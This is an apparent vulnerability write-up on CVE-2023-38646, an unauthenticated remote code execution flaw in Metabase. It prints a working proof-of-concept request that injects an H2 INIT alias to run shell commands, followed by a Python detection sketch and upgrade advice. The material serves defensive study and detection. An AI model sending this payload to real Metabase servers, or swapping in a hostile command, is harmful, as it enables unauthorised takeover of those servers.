CVE-2023-38646: Metabase Pre-auth RCE
Metabase is a popular business intelligence and data visualization software package. Earlier this week, it was reported that Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 have a vulnerability that allows attackers to execute arbitrary commands on the server, at the server’s privilege level. Authentication is not required for exploitation. This vulnerability was designated as CVE-2023-38646.
Reproducing CVE-2023-38646: Metabase Pre-auth RCE
PoC:
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Connection: close

{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",
"classname":"org.h2.Driver","advanced-options":true,
"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"sh\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('touch /tmp/xxx');"},"name":"x","engine":"postgres"}}
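For defenders, the request above has a recognisable shape: an unauthenticated POST to /api/setup/validate whose connection details name the H2 driver under a different declared engine and carry an INIT clause with CREATE ALIAS. The following detection sketch is an added example, not code from the original post or from Metabase; it assumes request bodies are available from a reverse proxy or WAF log, and the function names, finding labels and sample requests are constructed for illustration.

```python
import json
import re

# Markers taken from the request shown on this page.
MARKERS = {
    "h2-init-clause": re.compile(r"(?i)\bINIT\s*="),
    "h2-create-alias": re.compile(r"(?i)\bCREATE\s+ALIAS\b"),
}

def walk(node, key=""):
    """Yield (key, value) for every scalar in nested JSON."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from walk(v, k)
    elif isinstance(node, list):
        for v in node:
            yield from walk(v, key)
    else:
        yield key, node

def inspect_request(method, uri, body):
    """Return sorted finding names for one logged HTTP request."""
    path = uri.split("?", 1)[0].rstrip("/")
    if method.upper() != "POST" or path != "/api/setup/validate":
        return []
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return ["unparseable-body"]
    findings, engine, h2_driver = set(), None, False
    for key, value in walk(doc):
        if not isinstance(value, str):
            continue
        if key == "engine":
            engine = value.lower()
        elif (key, value.lower()) in {("subprotocol", "h2"), ("classname", "org.h2.driver")}:
            h2_driver = True
        findings.update(n for n, rx in MARKERS.items() if rx.search(value))
    # An H2 driver declared under a different engine, as in the request above.
    if h2_driver and engine != "h2":
        findings.add("engine-driver-mismatch")
    return sorted(findings)

# Constructed samples (not captured traffic); the Java source is elided.
BENIGN = json.dumps({"details": {"engine": "postgres", "details": {"host": "db", "port": 5432}}})
SUSPECT = json.dumps({"details": {"engine": "postgres", "details": {
    "subprotocol": "h2", "classname": "org.h2.Driver",
    "subname": "mem:;INIT=CREATE ALIAS EXAMPLE AS $$ <elided> $$"}}})
```

Any finding on this endpoint is worth reviewing on an instance whose setup is already complete, and upgrading to 0.46.6.1 / 1.46.6.1 or later remains the fix.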